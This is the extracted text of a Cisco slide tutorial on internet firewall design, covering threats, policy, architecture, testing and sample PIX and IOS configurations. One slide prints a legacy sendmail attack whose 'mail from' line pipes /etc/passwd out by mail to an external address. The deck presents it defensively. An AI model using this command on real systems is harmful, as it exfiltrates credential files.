Cisco - Internet Firewall Technology Tutorial

8/13/2019 Cisco - Internet Firewall Technology Tutorial

1/90

10999_03F8_c2

NW98_US_407

Internet

FirewallTechnology

Tutorial

0999_03F8_c2

NW98_US_407


2/90

20999_03F8_c2

NW98_US_407

Agenda

MotivationThreats and Attacks

Business Need

Design and Test Principles

Policy

Architecture Design Implementation

Cisco Solutions


3/90

30999_03F8_c2

NW98_US_407

Motivation:Security Threatsand Common

Network Attacks


4/904

0999_03F8_c2

NW98_US_407

Security Threats

Bob

Impersonation

BankCustomer

Deposit $1000 Deposit $100

Loss of Integrity

CPU

Denial of Service

Loss of Privacy

telnet foo.bar.org

username: danpassword:

m-y-p-a-s-s-w-o-r-d d-a-n

Im Bob, SendMe all CorporateCorrespondence

with Cisco


5/9050999_03F8_c2

NW98_US_407

Exploit Host Weaknesses

10.1.1.1

Good Bye


6/9060999_03F8_c2

NW98_US_407

Common Attacks

Routing attacks

Wiretapping

Active content

ICMP attacks

Denial of service attacks

TCP sequence attacks


7/9070999_03F8_c2

NW98_US_407

Send Mail Attacks

Grabbing the/etc/password file Injecting a file or running a script

mail from: "|/bin/mail [email protected] < /etc/passwd"

250 "|/bin/mail [email protected] < /etc/passwd"... Sender ok

rcpt to: mickeymouse

550 mickeymouse... User unknown

data

354 Enter mail, end with "." on a line by itself250 Mail accepted

quit


8/9080999_03F8_c2

NW98_US_407

Password Cracking

Features: graphical brute forcing,

cracking NT passwords, network session


9/9090999_03F8_c2

NW98_US_407

Newer Internet Attacks

Teardrop 1A fragmentation attack that works by exploitinga reassembly bug with overlapping fragments,and causes the targeted system to crashor hang

Teardrop 2The first fragment starts at offset 0 and thesecond fragment is within the TCP header

LandTakes a SYN packet with source addressand port are the same as the destination


10/9010

0999_03F8_c2

NW98_US_407

Other Items

SNMP v1 strings

CERT advisories

X11, RPC, NIS, NFS,NTP, finger

UDP high ports TCP high ports


11/9011

0999_03F8_c2

NW98_US_407

Service Configuration

no service fingerno service padno service tcp-small-serversno service udp-small-servers

no ip bootp serverno ip source-route

service password-encryptionenable secret YellowMegaMan

no enable password

no ip redirectno ip directed-broadcastno ip proxy-arp


12/9012

0999_03F8_c2

NW98_US_407

Motivation:

Business Need


13/90

130999_03F8_c2

NW98_US_407

Traditional Business

Employees

Partners

Customers

SuppliersEnterprise


14/90

140999_03F8_c2

NW98_US_407

The Need to Be Networked

A new model of information technology

Being connected is not enough,electronic commerce is not enough

You need to be networked to all yourimportant constituencies

Open up internal operational systemsand information to prospects, customers,partners, suppliers, and employees


15/90

150999_03F8_c2

NW98_US_407

The Global Networked Business

Employees Customers

Partners SuppliersEnterprise


16/90

160999_03F8_c2

NW98_US_407

Design: Policy


17/90

170999_03F8_c2

NW98_US_407

What Are the Business ProblemsYou are Trying to Solve?

Internet

BusinessNeed

Security Considerations

Internet

Access

InternetPresence

NetworkedCommerce

VPN andExtranets


18/90

What Are their Risks?

RSF: Risk-Safeguard FactorRVF: Risk-Value FactorSTF: Safeguard-Threat Factor

R: Risk

S: SafeguardT: ThreatV: ValueW: Weakness

SVF

RSF

VTF

WTF

RVF

++

+ +

+

+-

--

-

SVF: Safeguard-Value FactorVTF: Value-Threat FactorWTF: Weakness-Threat Factor

R TV S W

STF

180999_03F8_c2

NW98_US_407


19/90

190999_03F8_c2

NW98_US_407

Simplified Causal Diagram

+

-+

+

-

Weakness

-

Risk Value

AssuranceSafeguard

Threat

+

Threat: Hazards facing the information (attacks/time)Weakness: Vulnerability of the processing ($/attack)Safeguard: Methods of protection ($/time)Value: Dollar value of information ($)Assurance: Confidence factor ($/time)


20/90

200999_03F8_c2

NW98_US_407

Internet Access

ApplicationsWeb access and e-mail (using an external mail server)

Streaming audio/video

Security issuesProtection of internal resources from outsidersLimiting external privileges of internal users

Visibility of internal network addresses

Auditing usage and possible attacks

Internet


21/90

210999_03F8_c2

NW98_US_407

Internet Presence

Additional applicationsE-mail server managed locally

Web server

Additional security issuesProtection of public resources

Separation of public and internal networks

Authentication of remote users

E-Mail

WWW

Internet


22/90

220999_03F8_c2

NW98_US_407

Networked Commerce

Additional applications

Electronic commerce with controlled accessto business systems for ordering, etc.

Additional security issuesSecure gateway-internal communication

Client-commerce gateway encryption

Strong application authentication of client

CommerceGateways

InternalBusinessSystems

Internet


23/90

230999_03F8_c2

NW98_US_407

VPN and Extranets

Additional applicationsPrivate connections over public network

Virtual Private Network (VPN)

Additional security issuesEncryption between remote users/sites and HQ

Very strong network authentication of client

HQRemoteSite

Mobile and

Home Users

Extranet

Partner

Internet


24/90

240999_03F8_c2

NW98_US_407

Design:

Architecture


25/90

What Is a Firewall?

I think it was Pope Urban that first attempted a definitionin 1094. He enforced his definition in 1095-1099. Zangi,

the Prince of Mosul refuted it in 1144 and Saladin was leftto stave off Pope Eugenius III and St. Bernard between 1146

and 1148. And, as everyone knows, Richard the Lion Hearteddebated the definition with Saladin between 1189 and 1192

without a resolution. All of this is to say that this can becomea religious issue and many deaths will occur from it.

Chris Lonvick25

0999_03F8_c2

NW98_US_407


26/90

260999_03F8_c2

NW98_US_407

Security Technology Taxonomy

IdentityAccurately identify network usersand their privileges

IntegrityNetwork integrity through:Secure network perimetersPrivacy and encryptionReliable operation

Active AuditProvide auditing, accounting andactive detection and response

UNIVERSALPASSPORT

USA

UNIVERSALPASSPORT

USA

UNIVERSALPASSPORT


27/90

270999_03F8_c2

NW98_US_407

Firewall Design CriteriaOne

Where is your policy? Implement it

Hosts offering public services/access

are not secure Internal network hosts should not

offer public services/access

Private networks and hosts shouldnot be visible


28/90

280999_03F8_c2

NW98_US_407

Firewall Design CriteriaTwo

Know your network

Security for multiple Internet access points

Management and operation comfort

Network security cannot replacedata security

Detailed security and usageaccounting


29/90

290999_03F8_c2

NW98_US_407

Firewall Design CriteriaThree

A robust firewall is typicallynot one device

Layered topology; defense in depth

Redundancy and failover

Response plan


30/90

300999_03F8_c2

NW98_US_407

Internet Access Firewall Topology

Outside

Reasonable features and

performance at a low cost

Usually a router withfirewall capabilities


31/90

310999_03F8_c2

NW98_US_407

Internet Presence Firewall Topology

Dedicated firewall platforms

Multiple interfaces/layers

Many features, high performance

Outside

DemilitarizedZones (DMZs)

Public Access Server

Public Access Server


32/90

320999_03F8_c2

NW98_US_407

Lock-and-Key

Situation: you want a subset ofhosts on a network to accessa host on a remote network

protected by a firewall

With lock-and-key access, youcan enable only a desired set ofhosts to gain access by havingthem authenticate through aTACACS+ server


33/90

330999_03F8_c2

NW98_US_407

Lock-and-Key Configuration

aaa authentication login lockkey tacacs+ enable

access-list 101 dynamic telecommuter timeout 5 permitip any any

access-list 101 permit tcp any 10.1.1.1 eq 23

interface e0ip address 10.1.1.1 255.255.255.0

ip access-group 101 in

tacacs-server host 1.1.1.1

tacacs-server key cisco

line vty 0 4

password 7 telecommuter

login authentication lockkey

autocommand access-enable timeout 2


34/90

340999_03F8_c2

NW98_US_407

Networked Commerce

Coupled gateway and application servers

Encryption and authentication

OutsideWebEncryptedTransaction


35/90

350999_03F8_c2

NW98_US_407

VPNs and Extranets

Strong encryption, authenticationRouters, firewalls, end systems


36/90

360999_03F8_c2

NW98_US_407

Internet

InternalNetwork

IPSec: Standard for VPN Encryption

Standards complianceIPSec AH/ESP encapsulated tunnels

IKE key management

Fully interoperableCisco IOS, Firewalls, and other IPSec-compliant systems

Client supportWindows 95 and Windows NT 4.x (Cisco provided software)

Windows NT 5.0 (Microsoft/Cisco partnership)

Encrypted IP

IPS M d


37/90

370999_03F8_c2

NW98_US_407

IPSec Modes

IP HDR

May Be Encrypted

IP HDR Data

IPsec HDR Data

IP HDR Data

IPsec HDR IP HDRNew IPHDR

May Be Encrypted

Data

Tunnel Mode

Transport Mode

Vi t l P i t N t k E l


38/90

380999_03F8_c2

NW98_US_407

Virtual Private Network Example

128.49.48.1

Clear ClearEncrypted

128.49.54.1

VPN C fi ti


39/90

VPN Configuration

crypto ipsec transform-set first ah-md5-hmac

mode tunnelcrypto ipsec transform-set second ah-sha-hmacesp-des mode tunnel!crypto isakmp policy 5

auth rsa-encrhash md5

lifetime 3600!crypto map toBob 10 ipsec-isakmp

set peer 128.49.54.1set transform-set first secondmatch address 155

!interface e0

ip address 128.49.48.1 255.255.255.0crypto map toBob

!access-list 155 permit ip 128.49.48.1 0.0.0.255128.49.54.1 0.0.0.255

Define IPsec policy:Two transform sets providingencryption and authentication

Set IKE policy

Create a crypto mapdefine negotiating peerprioritize IPsec policymatch an access list

Configure interface,assign crypto map

Define access-list toencrypt all traffic

390999_03F8_c2

NW98_US_407


40/90

400999_03F8_c2

NW98_US_407

Design: Test

Fi ll T t C it i O


41/90

410999_03F8_c2

NW98_US_407

Firewall Test CriteriaOne

Where is your policy?Who controls routers?

Who controls firewalls?

Who makes up the security team?

Check policy and well-known holes

Scan the network

Test the firewall and the services behind it

Use verification and IDS tools

Firewall Test Criteria Two


42/90

420999_03F8_c2

NW98_US_407

Firewall Test CriteriaTwo

Do things work as expected?

Scan firewall

Scan DMZ and servicesScan internal network

Invert policy rules on sniffer

Log and document everything

Logging


43/90

430999_03F8_c2NW98_US_407

Logging

service timestamps debug datetime msecservice timestamps log datetime msec

logging buffered 16384logging trap debugginglogging 169.222.32.1logging source-interface loopback0

access-list 101 permit tcp any 10.1.1.1 eq 23 logging

ip ftp source-interface loopback0

ip ftp username c7200ip ftp password 7 8675309Gexception protocol ftpexception dump 10.1.1.1

Firewall Test Criteria Three


44/90

440999_03F8_c2NW98_US_407

Firewall Test CriteriaThree

Testing never ends

Know your network

Review logs

Educate staff and users

Keep revisions up to date


45/90

450999_03F8_c2NW98_US_407

Implementation:

Cisco Solutions

Cisco Firewall Product Line


46/90

460999_03F8_c2NW98_US_407

Cisco Firewall Product Line

Performance

Feature

Set

Cisco 1600/2500with Cisco IOS FW Features

CentriFirewallfor Windows NT

PIXFirewall

Supported Applications


47/90

470999_03F8_c2NW98_US_407

Supported Applications

Telnet, Web, FTP, and SMTP

RealAudio, RealVideo, and VDOLive

Lotus Notes, IMAP, and LDAP DNS resolves and zone transfers

RPC, R-Commands Other generic IP, TCP, and UDP


48/90

Java Blocking


49/90

490999_03F8_c2NW98_US_407

Inspect Port Command

Drops the Packet

HTTP Request

Java Signature

Server Reply

Requests for Java Applet

N

No Java SignatureLets it Through

Inspect

Web Server

Web Client

Java Blocking

Attack Detection and Prevention


50/90

500999_03F8_c2NW98_US_407

Attack Detection and Prevention

Events

Monitors the following statisticsand conditions:

Total embryonic connections

Per minute incoming new connection rate

Timer for TCP connections to reach established state

Packet count for duplicate syn packets

Packet sequence numbers

Alerts


51/90

510999_03F8_c2NW98_US_407

Alerts Non-statistical events

may trigger alerts Alerts set on groups of

events or specific ones

DoS attacks, SMTPcommand attacks, ordenied Java applet

Alerts are visual, email,and pager

Thresholds limit thenumber of alerts issueswhen repeating in agiven timeframe

Email is based on MAPI(install Messaging)

Beeper is based on TAPI

Adaptive Security Algorithm (ASA)


52/90

530999_03F8_c2NW98_US_407

Adaptive Security Algorithm (ASA)

Provides stateful connection policy

Connections allowed outallows returnsession backflow; incoming connectionsmust be explicitly enabled

Initial TCP sequence number randomized

Tracks source and destination ports +addresses, TCP sequences, andadditional TCP flags

Access control list (ACL) policy support UDP + TCP session state

TCPFIN bit

UDPOne minute default timer (except for DNS)

TCP ConnectionsInside to OutsideI iti li ti Ph


53/90

Assume data length = 100 octets;Checksum is modified not recalculated

Initialization Phase

PIX Checks if aTranslation Exists

or Not. If Not itCreates One Upon

Verifying NAT,Global, Access

Control andAuthentication, ifAny a Connection

Is Also Created

Back Spoofing

Sender736310.0.0.14

171.68.10.2

4005

23

100

4512

Sync

Data

Checksum

Destination Port

Checksum

Code

Acknowledge

PIX6514171.69.236.5

171.68.10.2

4005

23

3050

3124

Sync

IP

Spoofing

Connection

Receiver andResponder

3214

171.68.10.2

171.69.236.5

23

4005

31

4321

3151

IP

TCP

PIX follows adaptivesecurity algorithm

(Src IP, src port,

dest IP, dest port) check Sequence number check

Translation check

If the packet code bit was notsyn-ack, packet would havebeen dropped and logged

4321

171.68.10.2

10.0.0.14

23

4005

31

Sync-Ack

2143

201

Source IP Address

Destination IP Address

Source Port

Sequence Number

540999_03F8_c2NW98_US_407

TCP ConnectionsInside to OutsideD t T f


54/90

550999_03F8_c2NW98_US_407

Data Transfer

171.68.10.2

171.69.236.5

171.69.236.5

Since ACK Bit isSet, Connection andTranslation Entries

Should Exist

Sender4512

10.0.0.14

171.68.10.2

4005

23

201

3412

ACK

Data

132

Checksum

Source IP Address


Source Port

Destination Port

Sequence Number

Checksum

Code

Acknowledge

PIX3912

171.68.10.2

4005

23

3151

1234

ACK

3111

171.68.10.2

10.0.0.16

234005

132

3311

ACK

233

Receiver and

Responder2216

23

4005

132

2222

3252

ASA Checks Again

132

ACK

TCP ConnectionsInside to OutsideT i ti Ph


55/90

560999_03F8_c2NW98_US_407

Assume data length = 100 octets;Checksum is modified not recalculated

Termination Phase

171.68.10.2

171.69.236.5

171.68.10.2

171.68.10.2

171.68.10.2

171.69.236.5

Back Spoofing

Sender

1111

10.0.0.14

4005

23

1000

2222

FIN

Data

8000

PIX

2222

4005

23

3950

2222

FIN

1111

10.0.0.14

23

4005800

1111

FIN-ACK

1101

Receiver andResponder

4512

23

4005

800

2121

4051

PIX will only accept a packet withcode-bit FIN-ACK

All other packets dropped

Any packet after this packet wouldalso be dropped

Connection released immediately

Translation released after x-late time out

800

FIN-ACK

ChecksumSource IP Address


Source Port

Destination Port

Sequence Number

ChecksumCode

Acknowledge

Static vs. Conduit


56/90

570999_03F8_c2NW98_US_407

Static vs. Conduit Static

A static maps a global (outside) address to an inside(local) address. Any access to the global goes to themapped inside address. This gives an inside machinewith an illegal address a presence on the outside witha legal address. A static is secure (protected).

Conduit:

A conduit is a hole through the firewall allowingoutside machines to initiate connections to inside

machines. It is related to a static in that a static mapsa global address to a local machine. Conduits areonly as secure as you make them. They are usedfor service items.

Authorization


57/90

580999_03F8_c2NW98_US_407

Internet

Intranet

DNS/Mail

DMZ

ut o at oTelnet

Joe

InsideHost A

PIX Firewall

Internet

Cisco Secure

Joe

User Profileid=JoeFail=0

Service=ShellCmd=Telnet{Permit Host A}Cmd=FTP{Permit Host B}

SYN Flood Defender


58/90

590999_03F8_c2NW98_US_407

Throttles both internal and

external maximum sessionsInboundcontrols SYN flooding(denial of service)

Outboundlimits maximum sessions(controls applications such asMicrosofts Internet Explorer)

Protects session resources

from being depleted Maintains high network reliability

SYN Floods Trying to KILLM il S


59/90

600999_03F8_c2NW98_US_407

All AllowedCommands

OutsideInside

MailServer

Internet

SMTP

Mail Server

SynSyn

Syn

PIX Limit 2

Syn

AllowedAllowed

Stopped

Content Filter Trying to


60/90

610999_03F8_c2NW98_US_407

All AllowedCommands

MailServer

InternetSMTP

Debug

OK

NOOP

Get INFO

OutsideInside

Client VPNPIX Ravlin IPSec


61/90

620999_03F8_c2NW98_US_407

Standards complianceIPSec AH/ESP encapsulated tunnel

IKE key management

Wire-speed performance

Ethernet nowFast Ethernet late CY 98

Fully interoperableCisco IOS and otherIPSec-compliant systems

Internet

InternalNetwork

Encrypted IP

PIX with OTP Configuration


62/90

630999_03F8_c2NW98_US_407

g

Configuration on the PIX manager:Go to PIX manager: URL= 10.0.0.0.100:8080username = pixadmin password = cisco

On PIX manager: Click authenticationSelect TACACS+ server Click add

Server IP address = 10.0.0.100Encryption key: spackle Click OK

On PIX manager:Select authentication Click addSelect authenticate all

internal hosts or whateveris desired. Click OK. Click save.

Assume pin = 1234Passcode = 5551212

PIX with OTP Session


63/90

640999_03F8_c2NW98_US_407

Telnet prompt:Username: megaman

Enter passcode: 5551212

HTTP prompt: (Internet Explorer)You need a password toaccess this page

Resource HTTP authentication

Username megaman

Password 5551212

HTTP prompt: (Netscape)

Username and password requiredEnter username for HTTPauthentication at 172.16.50.87

User name megaman

Password 5551212

FTP prompt:Connected to 172.16.50.87

220FTP authentication 220

User (172.16.50.87:>:

331Enter PASSCODE: 331

Password:230220 TS09B6F FTP server(version Cisco Micro WebServer)ready

331Hello root, send password

230Login user root OK 230

PIX with Three Interfaces


64/90

650999_03F8_c2NW98_US_407

A web server for the inside

network. Access allowedonly from 172.28.0.0and 172.16.50.0

Public Network

Internet

Perimeter Network

Private Network

FTP Server

192.168.0.3

WebServer

192.168.0.2

10.0.0.100

192.168.0.1

10.0.0.3



65/90

660999_03F8_c2

NW98_US_407

nameif ethernet0 outside security0nameif ethernet1 inside security100nameif ethernet2 dmz security50enable password 8Ry2YjIyt7RRXU24 encryptedpasswd 2KFQnbNIdI.2KYOU encryptedhostname pixfirewallfailovernamesname 192.168.0.2 webservername 192.168.0.3 ftpserver

pager lines 24syslog output 20.3no syslog consoleinterface ethernet0 autointerface ethernet1 autointerface ethernet2 autoip address outside 172.16.50.3 255.255.255.0ip address inside 10.0.0.3 255.0.0.0

ip address dmz 172.168.0.1 255.255.255.0arp timeout 14400global (outside) 1 172.16.50.76-172.16.50.85global (dmz) 1 192.168.0.90-192.168.0.99nat (inside) 1 10.0.0.0 255.0.0.0nat (dmz) 1 192.168.0.0 255.255.255.0static (dmz,outside) 172.16.50.76 webserver 200 200static (dmz,outside) 172.16.50.77 ftpserver



66/90

670999_03F8_c2

NW98_US_407

static (inside,outside) 172.16.50.80 10.0.0.110conduit (dmz,outside) 172.16.50.76 80 tcp 0.0.0.0 0.0.0.0conduit (dmz,outside) 172.16.50.77 21 tcp 0.0.0.0 0.0.0.0

conduit (inside,outside) 172.16.50.80 21 tcp 172.28.0.0 255.255.0.0conduit (inside,outside) 172.16.50.80 80 tcp 172.28.0.0 255.255.0.0conduit (inside,outside) 172.16.50.80 21 tcp 172.16.50.0 255.255.255.0conduit (inside,outside) 172.16.50.80 80 tcp 172.16.50.0 255.255.255.0age 10rip outside passiveno rip outside defaultrip inside passive

rip inside defaultno rip dmz passiverip dmz defaultroute outside 0.0.0.0 0.0.0.0 172.16.50.1 1timeout xlate 24:00:00 conn 12:00:00 udp 0:02:00timeout rpc 0:10:00 h323 0:05:00 uauth 0:05:00tacacs-server host 10.0.0.100 abcaaa authentication any inbound 0.0.0.0 0.0.0.0 tacacs+

no snmp-server locationno snmp-server contactsnmp-server community publictelnet 10.0.0.100 255.255.255.255mtu outside 1500mtu inside 1500mtu dmz 1500: end

Centri Firewall


67/90

680999_03F8_c2

NW98_US_407

Windows NT Firewall

ICSA certified

Version 4.0.2 now shipping!

Evaluation softwareon the web at:http://www.cisco.com/centri

Ease of Use


68/90

690999_03F8_c2

NW98_US_407

Installation Wizard

Steps through initial configurationPredefined security policies

Graphical policy managerDrag-and-drop security policies

Secure remote administration

Secure Remote Administration


69/90

700999_03F8_c2

NW98_US_407

ISPNetwork

Private Network

Private Network

Private NetworkInternet

Secure remote admin

MS authenticated RPC

Centris asymmetricauthentication

From trusted oruntrusted sides

Reporting


70/90

710999_03F8_c2

NW98_US_407

Reports may be run on demand and scheduled to run

at fixed times (e.g. Mondays at 2 a.m.)

Reports are presented in HTML or Text and may bestored on the web server in the product (examiner)or sent to an e-mail address

To view reports it is simple to use the imbedded browserin Centri though you may use another browser if desired(port 8080no authentication)

There are three types of reports:

Warning (security issues and product oddities)Service (statistical details per service, no aggregates)

Connection (polls for open connections per service, no aggregates)

Flexible Security Policies


71/90

720999_03F8_c2

NW98_US_407

161.44.75.12By IP Address

By NTUsername

By Application

Security Policy

Open

Restrictive

Closed

By Timeof Day

Centri Firewall Architecture


72/90

730999_03F8_c2

NW98_US_407

Kernel ProxiesImplemented in Windows NT Kernel

Custom TCP/IP stack

Packet-filtering speedProxy functionality

Protects against common vulnerabilities inWindows NT (WinNuke, NetBIOS holes, etc.)

Intercept architecturePreservation of original network stack

Firewall communication is also protected

Capability of running servers on the firewall

Internet

Centri Firewall Design


73/90

74

0999_03F8_c2

NW98_US_407

VirtualInterface10.0.0.2

MicrosoftTCP/IPStack

Kernel Proxy

3rd-Party Apps

(DNS, Web, E-mail)

OutsideInterface

InsideInterface

192.204.18.2 10.0.0.1

Content

FilteringAuthentication

DeviceDriver

NT Kernel

Application

Layer

Other

Services

Kernel ProxySampleInboundData Flow


74/90

75

0999_03F8_c2

NW98_US_407

ApplicationSpace

KernelSpace

LocalCommunication

Channel

InternalProtocolStack

Centri Agents(e.g., Authentication)

205.50.50.2 10.0.0.1

Winsock

CentriVirtualAdapter

Native Microsoft NTTCP/IP Stack

Winsock Applications

(e.g., Web, DNS,MailServers)

10.0.0.2

TrustedServer

TrustedNetworkAdapter

UntrustedNetworkAdapter

Interceptor

SecurityVerification Engine

ExternalProtocolStack

Kernel ProxySampleNative StackData Flow


75/90

76

0999_03F8_c2

NW98_US_407

CentriVirtualAdapter

ApplicationSpace

KernelSpace

LocalCommunication

Channel

TrustedNetworkAdapter

Interceptor

SecurityVerification Engine

ExternalProtocolStack

Centri Agents(e.g., Authentication)

205.50.50.2 10.0.0.1

Winsock

Native Microsoft NTTCP/IP Stack

Winsock Applications

(e.g., Web, DNS,MailServers)

10.0.0.2

InternalProtocolStack

UntrustedNetworkAdapter

Site-Based Model


76/90

77

0999_03F8_c2

NW98_US_407

Policy enforcement occurs when

information passes between sites(intersite), not within the samesite (intrasite)

Rules are checked wheninformation leaves onesite for another

Install creates two sitestrusted and Internetwhichmay be expanded upon

post-install (e.g. adding anisolated service network [DMZ])

The local stack is tied by avirtual wire to a trusted site

Policy RulesChecked

IsolatedService

Network

InternetTrusted

Eight Kernel Proxies


77/90

78

0999_03F8_c2

NW98_US_407

IP

Source/destination checksPing- of-death prevention

IP spoof prevention

ICMPMessage type

TCPPort check

SYN flood prevention

UDP

Port check SMTP

Nested routing blocking

Minimal protocol set

Similar to Mail Guard

FTP

Inline user authenticationNon-transparent proxy mode

Allowed action checks

TelnetInline user authentication

Non-transparent proxy modePort check

HTTPInline user authentication

URL filtering

Java/ActiveX/Java Script Blocking

Allowed action checks

Centri Summary


78/90

79

0999_03F8_c2

NW98_US_407

High-performance Kernel Proxy firewall

Uses four breakthroughs in firewall userinterface design:

Natural network views

Bundled applications

Policy builder

Drag-and-drop policy deployment

Integrates well into Microsoft environment Policies based on NT domains, groups,

and users

Cisco IOS


79/90

80

0999_03F8_c2

NW98_US_407

Integrated security is not anew concept

Existing Cisco IOS security

technologies support:Perimeter security and access controlIdentification and user authentication

Denial of service (DoS) protection

Virtual private networking

Reporting

Existing Cisco IOSPerimeterSecurity Technologies


80/90

81

0999_03F8_c2

NW98_US_407

Access control lists Network address

translation (NAT)

VPN technologiesAuthentication

Network-layer encryption

Tunneling (GRE, L2F)

Peer router

Policy-basedmulti-interfacesupport

Event logging

TACACS+/RADIUSauthentication

Lock-and-key

security

Cisco IOS Firewall Feature SetEnhanced Security for


81/90

82

0999_03F8_c2

NW98_US_407

Context-Based Access Control (CBAC)Secure, per-application filtering

Support for advanced protocols(H.323, SQLnet, RealAudio, etc.)

Control downloading of Java applets

Denial of service detection and prevention

Real-time alerts TCP/UDP transaction log

Configuration and management

Enhanced Security for

the Intelligent Internet

Benefits...

I t t d l ti d it


82/90

83

0999_03F8_c2

NW98_US_407

Integrated solutionaccess and security

No new hardware requiredone box to manage

Full routing functionality

Applicable for Internet, intranet andextranet security

Full Cisco IOS software interoperability:customers can leverage their knowledge

of Cisco IOS software Low cost of implementation and

ownership for Cisco-installed base

Context-Based AccessControl (CBAC)


83/90

84

0999_03F8_c2

NW98_US_407

Tracks state and context of networkconnections to secure traffic flow

Inspects data coming into or leaving router

Allows connections to be established bytemporarily opening ports based onpayload inspection

Return packets authorized for particularconnection only via temporary ACL

Context-Based Access Control(CBAC) Application Support


84/90

85

0999_03F8_c2

NW98_US_407

Transparent support forcommon TCP/UDP Internetservices, including WWW,Telnet, SNMP, finger, etc.

FTP

TFTP

SMTP

Java blocking

BSD R-cmds Oracle SQL Net

Remote-procedure call (RPC)

Multimedia applications:VDOnets VDO Live

RealNetworks RealAudio

Intels InternetVideo Phone (H.323)

Microsofts NetMeeting (H.323)

Xing Technologies Streamworks

Whitepines CuSeeMe

IOS Firewall Transaction Log


85/90

86

0999_03F8_c2

NW98_US_407

Provides audit trail for tracking transactions Recognition of session and port

Information is sortable via tag

Sample:Sep 10 13:02:19 sifi-5 124: %FW-6-SESS_AUDIT_TRAIL:tcp session initiator (172.166.1.13:33192) sent 22 bytesresponder (172.166.129.11:25) sent 208 bytes

Sep 10 13:07:33 sifi-5 125: %FW-6-SESS_AUDIT_TRAIL:tcp session initiator (172.166.1.13:33194) sent 336 bytesresponder (172.166.129.11:25) sent 325 bytes

Sample Configuration


86/90

87

0999_03F8_c2

NW98_US_407

ip inspect name pri-net tcp

ip inspect name pri-net udpip inspect name pri-net ftpip inspect name pri-net h323ip inspect name pri-net realaudioip inspect name pri-net streamworks

ip inspect name pri-net vdoliveip inspect name pri-net cuseemeip inspect name pri-net http java-list 10

interface e0ip inspect pri-net in

ip access-group 101 out

access-list 10 permit 172.34.7.130access-list 101 deny ip any any

CFMI


87/90

88

0999_03F8_c2

NW98 US 407

Common security management for

enterprise infrastructure

Centralized visual policy development,management, and enforcement

Adaptive configuration of networkinfrastructure

Integrate existing and future authenticationtechnologies and Cisco firewall technologies

Support for scalable configuration ofIPSEC and IKE technologies

Physical network representation

Ciscos Firewall Family


88/90

89

0999_03F8_c2

NW98 US 407

Cisco IOS Firewall feature setAdvanced, rich security option for Cisco IOSsoftware, with full routing and WAN access capabilities,that integrates seamlessly with existing Cisco IOSsoftware-based environments

Centri Firewall

High-performance, flexible, Windows NT-based securitysoftware with intuitive user-based policy rules. Easy toinstall, configure, and manage

PIX

FirewallHighest-performance, scalable, dedicatedsecurity appliance with most advanced featuresand application support, fault tolerance

References

www cisco com/univercd/cc/td/doc/product/


89/90

90

0999_03F8_c2

NW98 US 407

www.cisco.com/univercd/cc/td/doc/product/

software/ios112/112cg_cr/2cbook/2cacclst.htmDescribes access lists and lock and key

www.cisco.com/warp/public/701/31.html

Increasing security on IP networks

www.cisco.com/warp/public/707/4.htmlStrategies to protect against TCP SYN DoS attacks

www.cisco.com/univercd/cc/td/doc/product/software/ios113ed/113t/113t_3/firewall.htm

Cisco IOS Firewall feature set docs

www.cisco.com/warp/public/458/41.html

NAT FAQ


90/90

91

0999_03F8_c2

NW98 US 407

Cisco - Internet Firewall Technology Tutorial

Documents

Transcript of Cisco - Internet Firewall Technology Tutorial